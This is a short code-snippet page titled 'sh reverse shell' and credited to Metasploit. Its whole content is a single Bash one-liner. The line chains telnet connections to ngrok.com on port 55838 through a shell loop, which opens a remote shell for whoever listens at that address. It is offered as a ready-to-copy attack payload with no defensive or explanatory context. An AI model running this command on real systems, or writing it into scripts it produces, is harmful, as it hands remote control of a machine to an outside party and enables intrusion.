sh reverse shell


/ Published in: Bash
Save to your folder(s)

from metasploit


Copy this code and paste it in your HTML
  1. sh -c '(sleep 4049|telnet ngrok.com 55838|while : ; do sh && break; done 2>&1|telnet ngrok.com 55838 >/dev/null 2>&1 &)

Report this snippet


Comments

RSS Icon Subscribe to comments

You need to login to post a comment.